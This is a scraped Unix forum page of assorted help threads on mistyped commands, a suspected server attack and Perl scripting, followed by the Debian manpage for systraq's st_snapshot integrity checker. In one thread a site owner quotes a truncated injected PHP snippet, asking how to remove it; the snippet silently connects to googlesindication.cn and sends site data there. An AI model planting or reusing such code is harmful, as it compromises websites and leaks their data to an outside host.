Can I just check - it looks from what you've said that you're trying to type 1s (that's a number one followed by a lower-case letter 'S') rather than ls (that's a lower-case letter 'L' followed by a lower-case letter 'S', which is the correct command).
If that's what you've been doing, could you try again with the correct command name and see what happens please ?
If you have been typing it correctly then your system must be quite badly damaged or missing some very fundamental binaries, since the ls command is pretty much as common as it gets on any UNIX-style system.
You are right. I was doing it wrong. It did look like a 1 to me...so this is what I got:
Tech support got back to me last night said it was a brute force attack (?) and that my install of "ban to fail" stopped it. But to me it looks as if it was run from "inside my computer". It slowed the server down to a crawl. also legitimate emails have stopped being able to send to comcast, Verizon, yahoo,etc. Have contacted them but they say we are not on their black list. Just can't figure this out. I have a minimal tech support package so they say "You have this....and you need to do this....good luck....Oh and by the way you can upgrade for $$$".
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard.
From parent.pl
$input1=123;
$input2=abc;
I tried calling it with
system("/usr/bin/perl child.pl $input1 $input2");
and
`perl... (1 Reply)
Hi All,
I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ??
print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">");
print("<input type = "text"... (1 Reply)
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open())
I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies
LEARN ABOUT DEBIAN
st_snapshot
ST_SNAPSHOT(1) systraq ST_SNAPSHOT(1)NAME
st_snapshot - calculate checksum and stat ownership and permissions of files
SYNOPSIS
ST_SUM=sha256sum st_snapshot patterns homepatterns
DESCRIPTION
st_snapshot calculates checksums and stats ownership and permissions of critical system files.
This script is typically run in either root-mode or public-mode. Running this script in root-mode requires root priviliges. One is
adviced to set up a dedicated user account for running this script in public mode.
In root-mode, the files snapshot_root.list and snapshot_root.homelist are typically passed as arguments. These pattern files are read by
the script and contain names of files and directories; listing a directory in such a pattern file is equivalent to listing all files which
live in the directorytree with this directory as root.
snapshot_root.list could e.g. read
# snapshot_root.list - files and directories we wanna get
# monitored: we wanna get a note once these files, or any file
# under these directories, gets created, gets rm-ed, gets
# permissions or contents changed. these notices will not
# include the possibly secret contents of these files
#
# this file gets read by st_systraq
/etc/group
/etc/gshadow
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/lilo.conf
/etc/passwd
/etc/postfix/server.pem
/etc/shadow
/etc/skel
/etc/ssh
Equivalent files snapshot_pub.list and snapshot_pub.homelist should be on the system. These files should contain all worldreadable to be
monitored files. This allows for running this script as root only in those cases where it's needed: when reading files, readable for root
only.
The homelist files contain files and directories which should get monitored for every homedirectory on the system. snapshot_pub.homelist
could e.g. contain:
.profile
.cshrc
.tcshrc
.login
.logout
.bash_profile
.bashrc
.exrc
.nexrc
As a special case, when the environment variable ST_OPHOMES is set to a non-empty string (typically when running in public mode), we stat
the permissions on all homedirectories themselves.
The produced snapshot is printed to stdout. The output when running in public mode could look like:
# ownership and permissions of homedirs
drwxr-xr-x root root /bin
drwxr-xr-x root root /dev
drwxr-sr-x root staff /home
drwxr-sr-x joostvb joostvb /home/joostvb
drwxr-xr-x root root /usr/sbin
drwxr-xr-x root root /var
# sha256sum of critical pub files
4d3cd13d6dbc10e2e3ccb9477cbc9eb9b76302454c276d5771ae0b10a5fbb4d2 /home/joostvb/.ssh/id_rsa.pub
eb8d83e0246f761a21bdfb13a03fac634ed7c3b7dde4c2efddd7b2838d32596f /var/qmail/alias/.bashrc
4e371f9a11f5a2464d3d5c952e58e24f73b377d33767ed93b2082fcb59a647fe /etc/zlogin
# ownership and permissions of critical pub files
-rw-rw-r-- joostvb joostvb /home/joostvb/.ssh/id_rsa.pub
-rw-r--r-- joostvb joostvb /home/joostvb/.ssh/authorized_keys
ENVIRONMENT
ST_OPHOMES - non-empty in case permissions on all homedirectories should be printed
ST_SUM - command for calculating file checksums. E.g. sha256sum, sha512sum, sha384sum, sha224sum or sha1sum.
SEE ALSO
The systraq manual.
VERSION
This manpage: $Id: st_snapshot.pod 374 2008-12-14 08:47:32Z joostvb $
COPYRIGHT
Copyright (C) 2001, 2002, 2003, 2004, 2008 Joost van Baal
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program (see COPYING); if not, check with
http://www.gnu.org/copyleft/gpl.html or write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111, USA.
AUTHOR
Joost van Baal <joostvb-systraq-20041015@mdcc.cx>
20081217 2008-12-15 ST_SNAPSHOT(1)